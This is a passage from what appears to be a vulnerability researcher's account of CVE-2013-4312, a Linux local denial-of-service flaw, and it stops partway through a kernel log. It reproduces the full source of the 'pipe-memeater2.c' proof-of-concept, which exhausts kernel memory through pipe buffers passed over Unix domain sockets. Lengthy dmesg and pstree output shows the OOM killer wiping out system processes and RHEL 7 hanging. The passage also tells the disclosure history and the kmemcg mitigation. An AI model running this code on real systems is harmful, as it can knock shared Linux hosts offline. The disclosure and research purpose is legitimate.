117.124393] lowmem_reserve[]: 0 2004 2004 2004 [ 117.125326] Node 0 DMA32 free:5696kB min:5708kB low:7132kB high:8560kB active_anon:432kB inactive_anon:3772kB active_file:48kB inactive_file:104kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:292kB slab_reclaimable:15132kB slab_unreclaimable:88516kB kernel_stack:1048kB pagetables:796kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:320 all_unreclaimable? yes [ 117.132331] lowmem_reserve[]: 0 0 0 0 [ 117.133309] Node 0 DMA: 0*4kB 76*8kB 0*16kB 1*32kB 2*64kB 1*128kB 2*256kB 1*512kB 2*1024kB 2*2048kB 0*4096kB = 8064kB [ 117.135516] Node 0 DMA32: 699*4kB 1*8kB 6*16kB 2*32kB 2*64kB 1*128kB 0*256kB 1*512kB 0*1024kB 1*2048kB 0*4096kB = 5780kB [ 117.137807] 112 total pagecache pages [ 117.138501] 0 pages in swap cache [ 117.139134] Swap cache stats: add 0, delete 0, find 0/0 [ 117.140090] Free swap = 0kB [ 117.140602] Total swap = 0kB [ 117.143667] 524272 pages RAM [ 117.144630] 13239 pages reserved [ 117.145267] 275 pages shared [ 117.145895] 489349 pages non-shared [ 117.146529] [ pid ] uid tgid total_vm rss cpu oom_adj name [ 117.147662] [ 1] 0 1 4850 75 0 0 init [ 117.148883] [ 423] 0 423 2767 200 0 -17 udevd [ 117.150166] [ 1086] 0 1086 2292 122 1 0 dhclient [ 117.151359] [ 1142] 0 1142 6399 59 0 -17 auditd [ 117.152556] [ 1285] 0 1285 5639 46 1 0 hald-addon-rfki [ 117.153910] [ 1293] 0 1293 5641 47 1 0 hald-addon-inpu [ 117.155214] [ 1317] 0 1317 16570 177 2 -17 sshd [ 117.156409] [ 1426] 0 1426 1028 21 2 0 mingetty [ 117.157610] [ 1428] 0 1428 1028 21 3 0 mingetty [ 117.158821] [ 1430] 0 1430 1032 21 0 0 agetty [ 117.160054] [ 1431] 0 1431 1028 21 1 0 mingetty [ 117.161282] [ 1433] 0 1433 1028 20 1 0 mingetty [ 117.162468] [ 1435] 0 1435 1028 21 2 0 mingetty [ 117.163692] [ 1437] 0 1437 2683 116 3 -17 udevd [ 117.164843] [ 1438] 0 1438 2683 116 2 -17 udevd [ 117.166093] [ 1694] 500 1694 993 19 2 0 pipe-memeater [ 117.167424] [ 1695] 500 1695 993 19 2 0 pipe-memeater [ 117.168767] [ 1697] 0 1697 1028 20 3 0 mingetty [ 117.170007] Out of memory: kill process 1694 (pipe-memeater) score 993 or a child [ 117.171449] Killed process 1694 (pipe-memeater) vsz:3972kB, anon-rss:76kB, file-rss:0kB [kumaneko@localhost ~]$ pstree -pA init(1)-+-agetty(1430) |-auditd(1142)---{auditd}(1143) |-dhclient(1086) |-hald-addon-inpu(1293) |-hald-addon-rfki(1285) |-mingetty(1426) |-mingetty(1428) |-mingetty(1431) |-mingetty(1433) |-mingetty(1435) |-mingetty(1697) |-pipe-memeater(1695) |-sshd(1317)---sshd(1770)---sshd(1772)---bash(1773)---pstree(1790) `-udevd(423)-+-udevd(1437) `-udevd(1438) [kumaneko@localhost ~]$ ---------- Example output end ----------
Therefore, CVE-2013-4312 was assigned to this vulnerability.
"Well, there was a function in TOMOYO 1.7's userspace tools which passes file descriptors using Unix domain socket. Then, if I use Unix domain socket, I feel that I can assign all memory for pipe's buffer by assigning all file descriptors for pipe using only 1 process."
---------- pipe-memeater2.c ---------- #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/un.h> #include <unistd.h> #include <fcntl.h> #include <poll.h> #define F_SETPIPE_SZ (1024 + 7) static int send_fd(int socket_fd, int fd) { struct msghdr msg = { }; struct iovec iov = { "", 1 }; char cmsg_buf[CMSG_SPACE(sizeof(int))]; struct cmsghdr *cmsg = (struct cmsghdr *) cmsg_buf; msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = cmsg_buf; msg.msg_controllen = sizeof(cmsg_buf); cmsg->cmsg_level = SOL_SOCKET; cmsg->cmsg_type = SCM_RIGHTS; cmsg->cmsg_len = CMSG_LEN(sizeof(int)); msg.msg_controllen = cmsg->cmsg_len; memmove(CMSG_DATA(cmsg), &fd, sizeof(int)); return sendmsg(socket_fd, &msg, MSG_DONTWAIT); } int main(int argc, char *argv[]) { int fd; int socket_fd[2] = { EOF, EOF }; for (fd = 0; fd < 1024; fd++) close(fd); for (fd = 0; fd < 10; fd++) if (fork() == 0) { fd = open("/proc/self/oom_score_adj", O_WRONLY); write(fd, "1", 1); close(fd); while (1) sleep(1); } if (fork() || fork() || setsid() == EOF) _exit(0); if (socketpair(PF_UNIX, SOCK_STREAM, 0, socket_fd)) _exit(0); fd = socket_fd[1]; while (1) { if (socketpair(PF_UNIX, SOCK_STREAM, 0, socket_fd) || send_fd(fd, socket_fd[0]) == EOF) break; while (1) { static char buf[4096]; int ret; int pipe_fd[2] = { EOF, EOF }; if (pipe(pipe_fd)) break; ret = send_fd(fd, pipe_fd[0]); if (argc == 1) { fcntl(pipe_fd[1], F_SETPIPE_SZ, 1048576); fcntl(pipe_fd[1], F_SETFL, O_NONBLOCK | fcntl(pipe_fd[1], F_GETFL)); while (write(pipe_fd[1], buf, sizeof(buf)) == sizeof(buf)); } close(pipe_fd[1]); close(pipe_fd[0]); if (ret == EOF) break; } close(socket_fd[0]); close(fd); fd = socket_fd[1]; } if (argc != 1) while (1) sleep(1); _exit(0); } ---------- pipe-memeater2.c ----------
---------- Example output start ---------- [kumaneko@localhost ~]$ pstree -pA init(1)-+-NetworkManager(1271) |-agetty(1502) |-auditd(1207)---{auditd}(1208) |-bonobo-activati(1699)---{bonobo-activat}(1700) |-console-kit-dae(1510)-+-{console-kit-da}(1511) | |-{console-kit-da}(1512) | |-{console-kit-da}(1513) | |-{console-kit-da}(1514) | |-{console-kit-da}(1515) | |-{console-kit-da}(1516) | |-{console-kit-da}(1517) | |-{console-kit-da}(1518) | |-{console-kit-da}(1519) | |-{console-kit-da}(1520) | |-{console-kit-da}(1521) | |-{console-kit-da}(1522) | |-{console-kit-da}(1523) | |-{console-kit-da}(1524) | |-{console-kit-da}(1525) | |-{console-kit-da}(1526) | |-{console-kit-da}(1527) | |-{console-kit-da}(1528) | |-{console-kit-da}(1529) | |-{console-kit-da}(1530) | |-{console-kit-da}(1531) | |-{console-kit-da}(1532) | |-{console-kit-da}(1533) | |-{console-kit-da}(1534) | |-{console-kit-da}(1535) | |-{console-kit-da}(1536) | |-{console-kit-da}(1537) | |-{console-kit-da}(1538) | |-{console-kit-da}(1539) | |-{console-kit-da}(1540) | |-{console-kit-da}(1541) | |-{console-kit-da}(1542) | |-{console-kit-da}(1543) | |-{console-kit-da}(1544) | |-{console-kit-da}(1545) | |-{console-kit-da}(1546) | |-{console-kit-da}(1547) | |-{console-kit-da}(1548) | |-{console-kit-da}(1549) | |-{console-kit-da}(1550) | |-{console-kit-da}(1551) | |-{console-kit-da}(1552) | |-{console-kit-da}(1553) | |-{console-kit-da}(1554) | |-{console-kit-da}(1555) | |-{console-kit-da}(1556) | |-{console-kit-da}(1557) | |-{console-kit-da}(1558) | |-{console-kit-da}(1559) | |-{console-kit-da}(1560) | |-{console-kit-da}(1561) | |-{console-kit-da}(1562) | |-{console-kit-da}(1563) | |-{console-kit-da}(1564) | |-{console-kit-da}(1565) | |-{console-kit-da}(1566) | |-{console-kit-da}(1567) | |-{console-kit-da}(1568) | |-{console-kit-da}(1569) | |-{console-kit-da}(1570) | |-{console-kit-da}(1571) | |-{console-kit-da}(1572) | `-{console-kit-da}(1574) |-crond(1476) |-dbus-daemon(1670) |-dbus-daemon(1258) |-dbus-launch(1669) |-devkit-power-da(1674) |-dhclient(1151) |-gconfd-2(1680) |-gdm-binary(1636)-+-gdm-simple-slav(1649)-+-Xorg(1652) | | |-gdm-session-wor(1730) | | |-gnome-session(1671)-+-at-spi-registry(1694) | | | |-gdm-simple-gree(1710) | | | |-gnome-power-man(1711) | | | |-metacity(1707) | | | |-polkit-gnome-au(1709) | | | `-{gnome-session}(1695) | | `-{gdm-simple-sla}(1653) | `-{gdm-binary}(1650) |-gnome-settings-(1697)---{gnome-settings}(1702) |-gvfsd(1706) |-hald(1310)-+-hald-runner(1311)-+-hald-addon-acpi(1366) | | |-hald-addon-inpu(1359) | | `-hald-addon-rfki(1349) | `-{hald}(1312) |-login(1492)---bash(1577) |-master(1464)-+-pickup(1481) | `-qmgr(1482) |-mingetty(1494) |-mingetty(1496) |-mingetty(1498) |-mingetty(1500) |-mingetty(1503) |-modem-manager(1275) |-notification-da(1716) |-polkitd(1714) |-pulseaudio(1723)---{pulseaudio}(1729) |-rsyslogd(1229)-+-{rsyslogd}(1230) | |-{rsyslogd}(1231) | `-{rsyslogd}(1233) |-rtkit-daemon(1725)-+-{rtkit-daemon}(1726) | `-{rtkit-daemon}(1727) |-sshd(1385)---sshd(1733)---sshd(1735)---bash(1736)---pstree(1753) |-udevd(487)-+-udevd(1507) | `-udevd(1508) `-wpa_supplicant(1350) [kumaneko@localhost ~]$ ./pipe-memeater2 (Omitting re-login operation) [kumaneko@localhost ~]$ dmesg [ 132.693170] pipe-memeater2 invoked oom-killer: gfp_mask=0x200d2, order=0, oom_adj=0, oom_score_adj=0 [ 132.695011] pipe-memeater2 cpuset=/ mems_allowed=0 [ 132.695984] Pid: 1766, comm: pipe-memeater2 Not tainted 2.6.32-573.26.1.el6.x86_64 #1 [ 132.697532] Call Trace: [ 132.698055] [<ffffffff810d7151>] ? cpuset_print_task_mems_allowed+0x91/0xb0 [ 132.699429] [<ffffffff8112a950>] ? dump_header+0x90/0x1b0 [ 132.700575] [<ffffffff8123360c>] ? security_real_capable_noaudit+0x3c/0x70 [ 132.701822] [<ffffffff8112add2>] ? oom_kill_process+0x82/0x2a0 [ 132.702877] [<ffffffff8112ad11>] ? select_bad_process+0xe1/0x120 [ 132.704026] [<ffffffff8112b210>] ? out_of_memory+0x220/0x3c0 [ 132.705082] [<ffffffff81137bec>] ? __alloc_pages_nodemask+0x93c/0x950 [ 132.706243] [<ffffffff8117097a>] ? alloc_pages_current+0xaa/0x110 [ 132.707432] [<ffffffff8119d274>] ? pipe_write+0x3c4/0x6b0 [ 132.708457] [<ffffffff81191f0a>] ? do_sync_write+0xfa/0x140 [ 132.709525] [<ffffffff81177f49>] ? ____cache_alloc_node+0x99/0x160 [ 132.710684] [<ffffffff810a1820>] ? autoremove_wake_function+0x0/0x40 [ 132.712004] [<ffffffff811b25f2>] ? alloc_fd+0x92/0x160 [ 132.712954] [<ffffffff81232026>] ? security_file_permission+0x16/0x20 [ 132.714140] [<ffffffff81192208>] ? vfs_write+0xb8/0x1a0 [ 132.715225] [<ffffffff811936f6>] ? fget_light_pos+0x16/0x50 [ 132.716293] [<ffffffff81192d41>] ? sys_write+0x51/0xb0 [ 132.717298] [<ffffffff810e8c2e>] ? __audit_syscall_exit+0x25e/0x290 [ 132.718554] [<ffffffff8100b0d2>] ? system_call_fastpath+0x16/0x1b [ 132.719749] Mem-Info: [ 132.720206] Node 0 DMA per-cpu: [ 132.720817] CPU 0: hi: 0, btch: 1 usd: 0 [ 132.721771] CPU 1: hi: 0, btch: 1 usd: 0 [ 132.722666] CPU 2: hi: 0, btch: 1 usd: 0 [ 132.723666] CPU 3: hi: 0, btch: 1 usd: 0 [ 132.724652] Node 0 DMA32 per-cpu: [ 132.725328] CPU 0: hi: 186, btch: 31 usd: 0 [ 132.726211] CPU 1: hi: 186, btch: 31 usd: 36 [ 132.727161] CPU 2: hi: 186, btch: 31 usd: 0 [ 132.728076] CPU 3: hi: 186, btch: 31 usd: 3 [ 132.728950] active_anon:14917 inactive_anon:249 isolated_anon:0 [ 132.728951] active_file:0 inactive_file:18 isolated_file:0 [ 132.728951] unevictable:0 dirty:8 writeback:0 unstable:0 [ 132.728951] free:13255 slab_reclaimable:7730 slab_unreclaimable:20346 [ 132.728952] mapped:281 shmem:306 pagetables:1876 bounce:0 [ 132.734252] Node 0 DMA free:8344kB min:332kB low:412kB high:496kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15300kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:84kB slab_unreclaimable:252kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 132.742139] lowmem_reserve[]: 0 2004 2004 2004 [ 132.743187] Node 0 DMA32 free:44676kB min:44720kB low:55900kB high:67080kB active_anon:59668kB inactive_anon:996kB active_file:0kB inactive_file:72kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:32kB writeback:0kB mapped:1124kB shmem:1224kB slab_reclaimable:30836kB slab_unreclaimable:81132kB kernel_stack:4384kB pagetables:7504kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:191 all_unreclaimable? yes [ 132.750447] lowmem_reserve[]: 0 0 0 0 [ 132.751251] Node 0 DMA: 2*4kB 0*8kB 1*16kB 2*32kB 1*64kB 2*128kB 1*256kB 1*512kB 1*1024kB 3*2048kB 0*4096kB = 8344kB [ 132.753469] Node 0 DMA32: 1595*4kB 865*8kB 431*16kB 241*32kB 130*64kB 34*128kB 2*256kB 1*512kB 1*1024kB 1*2048kB 0*4096kB = 44676kB [ 132.755994] 356 total pagecache pages [ 132.756679] 0 pages in swap cache [ 132.757295] Swap cache stats: add 0, delete 0, find 0/0 [ 132.758283] Free swap = 0kB [ 132.758803] Total swap = 0kB [ 132.761657] 524272 pages RAM [ 132.762296] 45689 pages reserved [ 132.762876] 1143 pages shared [ 132.763423] 459523 pages non-shared [ 132.764069] [ pid ] uid tgid total_vm rss cpu oom_adj oom_score_adj name [ 132.765411] [ 487] 0 487 2699 145 0 -17 -1000 udevd [ 132.766814] [ 1151] 0 1151 2280 123 1 0 0 dhclient [ 132.768201] [ 1207] 0 1207 6899 61 3 -17 -1000 auditd [ 132.769536] [ 1229] 0 1229 62271 648 3 0 0 rsyslogd [ 132.770997] [ 1258] 81 1258 5459 168 2 0 0 dbus-daemon [ 132.772434] [ 1271] 0 1271 20705 222 3 0 0 NetworkManager [ 132.773961] [ 1275] 0 1275 14530 124 3 0 0 modem-manager [ 132.775459] [ 1310] 68 1310 9588 292 3 0 0 hald [ 132.776834] [ 1311] 0 1311 5099 55 3 0 0 hald-runner [ 132.778298] [ 1349] 0 1349 5627 46 1 0 0 hald-addon-rfki [ 132.779789] [ 1350] 0 1350 11247 134 0 0 0 wpa_supplicant [ 132.781244] [ 1359] 0 1359 5629 46 3 0 0 hald-addon-inpu [ 132.782802] [ 1366] 68 1366 4501 41 1 0 0 hald-addon-acpi [ 132.784277] [ 1385] 0 1385 16558 177 0 -17 -1000 sshd [ 132.785665] [ 1464] 0 1464 20222 226 3 0 0 master [ 132.787005] [ 1476] 0 1476 29216 153 0 0 0 crond [ 132.788365] [ 1481] 89 1481 20242 218 2 0 0 pickup [ 132.789833] [ 1482] 89 1482 20259 219 0 0 0 qmgr [ 132.791187] [ 1492] 0 1492 17403 127 1 0 0 login [ 132.792555] [ 1494] 0 1494 1016 21 0 0 0 mingetty [ 132.794302] [ 1496] 0 1496 1016 21 0 0 0 mingetty [ 132.795719] [ 1498] 0 1498 1016 22 0 0 0 mingetty [ 132.797089] [ 1500] 0 1500 1016 22 0 0 0 mingetty [ 132.798541] [ 1502] 0 1502 1020 23 0 0 0 agetty [ 132.799880] [ 1503] 0 1503 1016 20 0 0 0 mingetty [ 132.801484] [ 1507] 0 1507 2698 144 2 -17 -1000 udevd [ 132.802964] [ 1508] 0 1508 2698 144 0 -17 -1000 udevd [ 132.804308] [ 1510] 0 1510 521256 341 3 0 0 console-kit-dae [ 132.805966] [ 1577] 0 1577 27076 95 2 0 0 bash [ 132.807295] [ 1636] 0 1636 33501 81 0 0 0 gdm-binary [ 132.808710] [ 1649] 0 1649 41156 153 3 0 0 gdm-simple-slav [ 132.810269] [ 1652] 0 1652 42840 4384 3 0 0 Xorg [ 132.811594] [ 1669] 42 1669 5009 66 2 0 0 dbus-launch [ 132.813061] [ 1670] 42 1670 5390 86 3 0 0 dbus-daemon [ 132.814495] [ 1671] 42 1671 67289 479 1 0 0 gnome-session [ 132.815956] [ 1674] 0 1674 12490 161 3 0 0 devkit-power-da [ 132.817561] [ 1680] 42 1680 33055 539 3 0 0 gconfd-2 [ 132.819058] [ 1694] 42 1694 30175 292 0 0 0 at-spi-registry [ 132.820530] [ 1697] 42 1697 86838 958 1 0 0 gnome-settings- [ 132.822181] [ 1699] 42 1699 89636 197 1 0 0 bonobo-activati [ 132.823653] [ 1706] 42 1706 33819 82 1 0 0 gvfsd [ 132.825062] [ 1707] 42 1707 71453 682 1 0 0 metacity [ 132.826434] [ 1709] 42 1709 62076 443 0 0 0 polkit-gnome-au [ 132.827924] [ 1710] 42 1710 95132 1239 3 0 0 gdm-simple-gree [ 132.829457] [ 1711] 42 1711 68423 516 3 0 0 gnome-power-man [ 132.830948] [ 1714] 0 1714 13157 303 2 0 0 polkitd [ 132.832303] [ 1723] 42 1723 86434 201 2 0 0 pulseaudio [ 132.833781] [ 1725] 498 1725 42113 53 2 0 0 rtkit-daemon [ 132.835231] [ 1730] 0 1730 35441 95 3 0 0 gdm-session-wor [ 132.836776] [ 1733] 0 1733 25629 255 0 0 0 sshd [ 132.838102] [ 1735] 500 1735 25629 256 0 0 0 sshd [ 132.839429] [ 1736] 500 1736 27076 94 2 0 0 bash [ 132.840851] [ 1755] 500 1755 981 20 3 0 1 pipe-memeater2 [ 132.842372] [ 1756] 500 1756 981 20 0 0 1 pipe-memeater2 [ 132.843858] [ 1757] 500 1757 981 20 1 0 1 pipe-memeater2 [ 132.845384] [ 1758] 500 1758 981 20 3 0 1 pipe-memeater2 [ 132.846866] [ 1759] 500 1759 981 20 0 0 1 pipe-memeater2 [ 132.848426] [ 1760] 500 1760 981 20 1 0 1 pipe-memeater2 [ 132.850046] [ 1761] 500 1761 981 20 0 0 1 pipe-memeater2 [ 132.851526] [ 1762] 500 1762 981 20 3 0 1 pipe-memeater2 [ 132.853038] [ 1763] 500 1763 981 20 0 0 1 pipe-memeater2 [ 132.854517] [ 1764] 500 1764 981 20 1 0 1 pipe-memeater2 [ 132.856059] [ 1766] 500 1766 981 20 1 0 0 pipe-memeater2 [ 132.857548] Out of memory: Kill process 1697 (gnome-settings-) score 2 or sacrifice child [ 132.859015] Killed process 1697, UID 42, (gnome-settings-) total-vm:347352kB, anon-rss:3252kB, file-rss:580kB (Omitting repetitions) [ 137.704574] pipe-memeater2 invoked oom-killer: gfp_mask=0x201da, order=0, oom_adj=0, oom_score_adj=0 [ 137.707278] pipe-memeater2 cpuset=/ mems_allowed=0 [ 137.708516] Pid: 1766, comm: pipe-memeater2 Not tainted 2.6.32-573.26.1.el6.x86_64 #1 [ 137.710327] Call Trace: [ 137.711014] [<ffffffff810d7151>] ? cpuset_print_task_mems_allowed+0x91/0xb0 [ 137.712503] [<ffffffff8112a950>] ? dump_header+0x90/0x1b0 [ 137.713895] [<ffffffff8153c797>] ? _spin_unlock_irqrestore+0x17/0x20 [ 137.715475] [<ffffffff8112add2>] ? oom_kill_process+0x82/0x2a0 [ 137.716797] [<ffffffff8112ad11>] ? select_bad_process+0xe1/0x120 [ 137.718171] [<ffffffff8112b210>] ? out_of_memory+0x220/0x3c0 [ 137.719466] [<ffffffff81137bec>] ? __alloc_pages_nodemask+0x93c/0x950 [ 137.720710] [<ffffffff8117097a>] ? alloc_pages_current+0xaa/0x110 [ 137.721864] [<ffffffff81127d47>] ? __page_cache_alloc+0x87/0x90 [ 137.723103] [<ffffffff8112772e>] ? find_get_page+0x1e/0xa0 [ 137.724195] [<ffffffff81128ce7>] ? filemap_fault+0x1a7/0x500 [ 137.725370] [<ffffffff811522c4>] ? __do_fault+0x54/0x530 [ 137.726422] [<ffffffff8107ed47>] ? current_fs_time+0x27/0x30 [ 137.727569] [<ffffffff81152897>] ? handle_pte_fault+0xf7/0xb20 [ 137.728774] [<ffffffff8119d1da>] ? pipe_write+0x32a/0x6b0 [ 137.730021] [<ffffffff81153559>] ? handle_mm_fault+0x299/0x3d0 [ 137.731316] [<ffffffff8104f156>] ? __do_page_fault+0x146/0x500 [ 137.732674] [<ffffffff811b25f2>] ? alloc_fd+0x92/0x160 [ 137.733747] [<ffffffff8153f90e>] ? do_page_fault+0x3e/0xa0 [ 137.735073] [<ffffffff8153cc55>] ? page_fault+0x25/0x30 [ 137.736314] Mem-Info: [ 137.737119] Node 0 DMA per-cpu: [ 137.738204] CPU 0: hi: 0, btch: 1 usd: 0 [ 137.739307] CPU 1: hi: 0, btch: 1 usd: 0 [ 137.740428] CPU 2: hi: 0, btch: 1 usd: 0 [ 137.741553] CPU 3: hi: 0, btch: 1 usd: 0 [ 137.742553] Node 0 DMA32 per-cpu: [ 137.743233] CPU 0: hi: 186, btch: 31 usd: 4 [ 137.745237] CPU 1: hi: 186, btch: 31 usd: 0 [ 137.746208] CPU 2: hi: 186, btch: 31 usd: 0 [ 137.747148] CPU 3: hi: 186, btch: 31 usd: 0 [ 137.748115] active_anon:634 inactive_anon:18 isolated_anon:0 [ 137.748115] active_file:0 inactive_file:96 isolated_file:0 [ 137.748116] unevictable:0 dirty:0 writeback:0 unstable:0 [ 137.748116] free:13318 slab_reclaimable:7641 slab_unreclaimable:20767 [ 137.748117] mapped:21 shmem:75 pagetables:118 bounce:0 [ 137.753688] Node 0 DMA free:8344kB min:332kB low:412kB high:496kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15300kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:92kB slab_unreclaimable:252kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 137.760653] lowmem_reserve[]: 0 2004 2004 2004 [ 137.761734] Node 0 DMA32 free:44928kB min:44720kB low:55900kB high:67080kB active_anon:2536kB inactive_anon:72kB active_file:0kB inactive_file:384kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:0kB writeback:0kB mapped:84kB shmem:300kB slab_reclaimable:30472kB slab_unreclaimable:82816kB kernel_stack:2928kB pagetables:472kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 137.769505] lowmem_reserve[]: 0 0 0 0 [ 137.770383] Node 0 DMA: 2*4kB 0*8kB 1*16kB 2*32kB 1*64kB 2*128kB 1*256kB 1*512kB 1*1024kB 3*2048kB 0*4096kB = 8344kB [ 137.772807] Node 0 DMA32: 810*4kB 612*8kB 293*16kB 185*32kB 99*64kB 50*128kB 15*256kB 9*512kB 3*1024kB 1*2048kB 0*4096kB = 45048kB [ 137.775481] 239 total pagecache pages [ 137.776214] 0 pages in swap cache [ 137.776877] Swap cache stats: add 0, delete 0, find 0/0 [ 137.777916] Free swap = 0kB [ 137.778504] Total swap = 0kB [ 137.781695] 524272 pages RAM [ 137.782347] 45689 pages reserved [ 137.783046] 314 pages shared [ 137.783631] 460183 pages non-shared [ 137.784339] [ pid ] uid tgid total_vm rss cpu oom_adj oom_score_adj name [ 137.785819] [ 487] 0 487 2699 145 0 -17 -1000 udevd [ 137.787313] [ 1207] 0 1207 6899 61 3 -17 -1000 auditd [ 137.788720] [ 1385] 0 1385 16558 177 0 -17 -1000 sshd [ 137.790073] [ 1507] 0 1507 2698 144 2 -17 -1000 udevd [ 137.791486] [ 1508] 0 1508 2698 144 0 -17 -1000 udevd [ 137.792912] [ 1766] 500 1766 981 20 3 0 0 pipe-memeater2 [ 137.794509] Out of memory: Kill process 1766 (pipe-memeater2) score 1 or sacrifice child [ 137.796076] Killed process 1766, UID 500, (pipe-memeater2) total-vm:3924kB, anon-rss:80kB, file-rss:0kB [kumaneko@localhost ~]$ pstree -pA init(1)-+-agetty(1777) |-auditd(1207)---{auditd}(1208) |-mingetty(1768) |-mingetty(1769) |-mingetty(1770) |-mingetty(1771) |-mingetty(1772) |-mingetty(1773) |-sshd(1385)---sshd(1856)---sshd(1858)---bash(1859)---pstree(1877) `-udevd(487)-+-udevd(1507) `-udevd(1508) [kumaneko@localhost ~]$ ---------- Example output end ----------
This means that, this DoS attack succeeds on not only Linux 2.6.35 and later (which contains the patch in question) but also Linux 2.0 (which was released in July, 1996 and which supports passing file descriptors using Unix domain sockets).
→All currently running Linux systems will be affected.
If using Linux 3.8 and later (which supports kmemcg in memory cgroup functionality), it will be possible to restrict kernel memory usage such as pipe's buffer if kmemcg is configured appropriately.
But we cannot mitigate if Linux 3.7 and earlier (due to kmemcg not supported) or kmemcg is not configured.
→How many of systems which allow execution of user defined programs configure kmemcg?
Discussions went in a non-public mailing list for handling vulnerabilities ( security@kernel.org ). But this vulnerability was considered as "not worth addressing seriously".
·In the first place, allowing untrusted local users to login is the fault of administrators.
→While you immediately address privilege escalation bug which can be exploited by local users, why you don't immediately address local DoS attack which can be exploited by local users?
·We can mitigate by configuring kmemcg (in memory cgroup) appropriately.
→In the first place, can we configure kmemcg appropriately? Why you desert administrators using older kernels which does not support kmemcg?
·There are other ways for attacking.
→ Since I have experiences of access control modules such as CaitSith, I proposed an LSM module which restricts available file descriptors based on conditions like user ID and/or group ID. But that module was not accepted because it was judged as "a too grandiose change for addressing this problem".
Therefore, situation without any solutions lasted.
In the meanwhile, RHEL 7 beta was released in December 2013.
systemd was introduced, and many procedures such as starting/ending daemon processes were put under the control of systemd. Also, while the default filesystem for RHEL 6 was ext4, the default filesystem for RHEL 7 became xfs.
"I was able to terminate almost all daemon processes in RHEL6. Does the same thing happen in RHEL7?"
and I tried using RHEL 7 beta with GUI environment installed. However ···
something is wrong when running the reproducer program on RHEL 7 beta.
I was expecting that almost all processes are killed by OOM killer. But actually, the whole system sometimes freezes before or after OOM killer is invoked.
---------- Example output of a hang up before OOM killer is invoked start ---------- ( I pressed SysRq-m in order to display memory information, for the system was not responding for 1 minute after pipe-memeater2 was started. ) [ 143.112366] SysRq : Show Memory [ 143.114964] Mem-Info: [ 143.116515] Node 0 DMA per-cpu: [ 143.118718] CPU 0: hi: 0, btch: 1 usd: 0 [ 143.121888] CPU 1: hi: 0, btch: 1 usd: 0 [ 143.125057] CPU 2: hi: 0, btch: 1 usd: 0 [ 143.128223] CPU 3: hi: 0, btch: 1 usd: 0 [ 143.131423] Node 0 DMA32 per-cpu: [ 143.133751] CPU 0: hi: 186, btch: 31 usd: 0 [ 143.136898] CPU 1: hi: 186, btch: 31 usd: 0 [ 143.140448] CPU 2: hi: 186, btch: 31 usd: 0 [ 143.141648] CPU 3: hi: 186, btch: 31 usd: 0 [ 143.142848] active_anon:94430 inactive_anon:2419 isolated_anon:0 [ 143.142848] active_file:25 inactive_file:27 isolated_file:46 [ 143.142848] unevictable:0 dirty:25 writeback:0 unstable:0 [ 143.142848] free:13044 slab_reclaimable:5548 slab_unreclaimable:8850 [ 143.142848] mapped:856 shmem:2589 pagetables:5786 bounce:0 [ 143.142848] free_cma:0 [ 143.150637] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:3188kB inactive_anon:112kB active_file:0kB inactive_file:24kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:16kB shmem:124kB slab_reclaimable:144kB slab_unreclaimable:300kB kernel_stack:16kB pagetables:248kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 143.160561] lowmem_reserve[]: 0 1802 1802 1802 [ 143.161866] Node 0 DMA32 free:44608kB min:44668kB low:55832kB high:67000kB active_anon:374532kB inactive_anon:9564kB active_file:100kB inactive_file:84kB unevictable:0kB isolated(anon):0kB isolated(file):184kB present:2080640kB managed:1845300kB mlocked:0kB dirty:100kB writeback:0kB mapped:3408kB shmem:10232kB slab_reclaimable:22048kB slab_unreclaimable:35100kB kernel_stack:5296kB pagetables:22896kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 143.172186] lowmem_reserve[]: 0 0 0 0 [ 143.172895] Node 0 DMA: 50*4kB (UM) 46*8kB (M) 30*16kB (M) 18*32kB (M) 11*64kB (UM) 5*128kB (UM) 0*256kB 1*512kB (U) 0*1024kB 2*2048kB (MR) 0*4096kB = 7576kB [ 143.175751] Node 0 DMA32: 3297*4kB (UEM) 1562*8kB (UEM) 647*16kB (UEM) 135*32kB (UEM) 4*64kB (UEM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44708kB [ 143.178506] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 143.180035] 2666 total pagecache pages [ 143.180639] 0 pages in swap cache [ 143.181175] Swap cache stats: add 0, delete 0, find 0/0 [ 143.182004] Free swap = 0kB [ 143.182471] Total swap = 0kB [ 143.185995] 524287 pages RAM [ 143.186492] 54799 pages reserved [ 143.187047] 527642 pages shared [ 143.187555] 453340 pages non-shared ( I pressed SysRq-f in order to invoke OOM killer, for OOM killer is not invoked automatically despite DMA32's free: is already below min: watermark. ) [ 160.509185] SysRq : Manual OOM execution [ 160.512561] kworker/0:2 invoked oom-killer: gfp_mask=0xd0, order=0, oom_score_adj=0 [ 160.517679] kworker/0:2 cpuset=/ mems_allowed=0 [ 160.520700] CPU: 0 PID: 185 Comm: kworker/0:2 Not tainted 3.10.0-123.el7.x86_64 #1 [ 